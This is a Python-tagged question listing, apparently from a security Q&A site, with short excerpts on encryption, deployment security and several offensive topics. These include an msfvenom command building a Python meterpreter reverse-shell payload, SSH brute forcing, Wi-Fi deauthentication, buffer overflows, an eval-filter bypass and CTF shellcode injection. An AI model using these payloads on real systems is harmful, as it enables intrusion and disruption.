Questions tagged [python]
High-level dynamic language developed by Guido van Rossum, particularly popular for server-side web programming and scripting.
424 questions
-1
votes
0
answers
25
views
Nettacker ssh_brute module detects SSH port but no success output despite valid credentials [closed]
Description:
I am using OWASP Nettacker v0.4.0 to perform SSH brute force on a target system with IP 192.168.29.62. The ports 22 and 2222 are detected as running OpenSSH 10.2p1 Debian 2. Attempts to ...
2
votes
0
answers
210
views
How to do a bufferoverflow attack for a simple C program?
Consider the following simple C program that asks the user for to input their user name and password in order to get access to some website. (The correct username is supposed to be "admin" ...
5
votes
2
answers
2k
views
What's a good way to append a nonce to ciphertext in Python for AES GCM in Python?
I'm not a security expert, so please excuse this question if it's silly, but I would really like an answer. I am using AES GCM to encrypt and would like to combine the randomly generated nonce with ...
1
vote
1
answer
140
views
How can I prevent msfvenom Python payloads from forking without manually decoding the payload?
I am generating a Python payload using msfvenom with the following command:
msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=...
2
votes
2
answers
283
views
How do I capture HTTPS requests with Python if I have full access to the user's computer
Before any of you answer, "HTTPS is built on top of TLS and everything is encrypted"
I need to specify a very important note: I have FULL access to the client's machine (Windows)
My ...
4
votes
2
answers
2k
views
Securing HTTP File Transfer over local network
My intention is to transfer files between a computer and a cell phone in the same network. I have created a system consisting of two apps for this purpose (everyone should be able to use the apps): ...
1
vote
0
answers
74
views
Looking for feedback and advise on security of my application [closed]
I have built a secure password management application using python. From my understanding I have completed the implementation in a secure manner. I would like to see if there are any flaws in my ...
1
vote
0
answers
530
views
Buffer Overflow shell
I'm trying to exploit the code posted by ir0nstone at this link. I followed any of the steps listed in the tutorial, but Address space layout randomization (ASLR) is not enabled on my machine. When I ...
0
votes
0
answers
686
views
How to bypass ascii_letters and run the code in eval
I have the following code:
if request.method == 'POST':
exp = request.form['Expression']
for i in exp:
if i in ascii_letters:
return render_template('index.html',
...
1
vote
0
answers
195
views
I'm not sure if my python deauth attack isn't working properly or if I can't capture deauthentication packages with wireshark? [closed]
I've been testing trying to deauthenticate my kindle from own wifi network. I created the following python script using scapy:
from scapy.all import(
RadioTap,
Dot11,
Dot11Deauth,
...
13
votes
3
answers
5k
views
Filter arbitrary code for blacklisted keywords except on commented lines
I have a Rust-app executing Python-scripts using PyO3. The Python-scripts are uploaded by users, so I need to check for unsafe code before executing it. The scripts should only be able to do ...
2
votes
1
answer
318
views
How should I communicate with an smtp server using socket library in Python? [closed]
I am trying to print the output of the 'HELP' command using the socket library in Python to communicate with an SMTP server, not the output of my connection to the SMTP server.
That is how my Pythonic ...
0
votes
1
answer
537
views
Burpsuite proxy does not get HTTP error 429 but vanilla python requests do?
When I make a normal Python request to some site without any proxies, I get a 429 response, which is too many requests. However, when I open up Burpsuite proxy and add:
import requests
# Set up the ...
1
vote
1
answer
523
views
Decrypt python source code at runtime [closed]
I'm wondering if it's possible to get the source code of some python program if the developer encrypted this source. We download a program in which the source is encrypted. But in order to translate ...
0
votes
1
answer
1k
views
Does pip-audit just search requirements.txt for known CVEs?
When looking for a way to shrink the attack surface for pypi package-typo-squatting, I came across a package called pip-audit on an article on the RedHat blog.
I attempted to use it, but I'm quite ...
0
votes
0
answers
454
views
Encoding shellcode to hide in filename / directory
Working on a CTF challenge and the coordinators hint suggests that one of the vectors to inject shellcode is via pathing. Looking at debugging prints does show the cwd and filename are passed onto the ...
0
votes
1
answer
151
views
Is deploying a web application to a customer's encrypted drive a secure solution against code theft?
I have developed a web service for customer. The web service is written in Python and running in Docker containers. It is managed by docker compose.
The customer wants my web service to run on their ...
3
votes
1
answer
1k
views
How do I prevent user from accessing docker image content?
I have a SaaS web application. One of my clients needs the app to be installed on his infrastructure (meaning physically on servers only they can access). The application stack is 2 docker images: one ...
2
votes
0
answers
185
views
Using API key as public key and IP address as private key to WASM application
I'm trying to offer a service to users that allows them to write Python via pyodide or R code via webR in their browser against my own data. I've been thinking of ways to go about this and I'm curious ...
1
vote
1
answer
137
views
clkhash - why is secret secret?
The documentation for clkhash (https://clkhash.readthedocs.io/en/stable/tutorial_api.html) states that "knowledge of this secret is sufficient to reconstruct the PII information from a CLK". ...
0
votes
0
answers
1k
views
Arbitrary File Upload Vulnerability
I have found an arbitrary file upload vulnerability on a flask application that I was playing with that essentially allows me to append to any file (and create new ones) in the file system. The code ...
0
votes
1
answer
2k
views
Not able to see server response when making request using python
Using the requests library, I am trying to make request to a url. I've set the target to the specific url and checked, "And URL Is in Target Scope" in both Request interception rules and ...
0
votes
0
answers
291
views
store strings in db with asymmetric encryption for a python app keeping the data secure
I'm designing an app that receives sensitive data input from a user and that data needs to be saved securely in a database.
As far as I understand it needs asymmetric encryption but since this app has ...
1
vote
1
answer
214
views
Need help deciphering these logs regarding YASSL attack on MySQL [closed]
I am getting the occasional message from our Fortigate Fortinet firewall, indicating that there is a yaSSL.Buffer.Overflow attack. The log from the Fortinet is:
Description: Subject: attack:MySQL....
1
vote
1
answer
143
views
Is my Jupyter notebook on EC2 secure?
I have a product I am making available to some users that runs via a Jupyter notebook. I deploy Jupyter inside of a docker container to an EC2 host. Each user gets an instance I'll send to them. For ...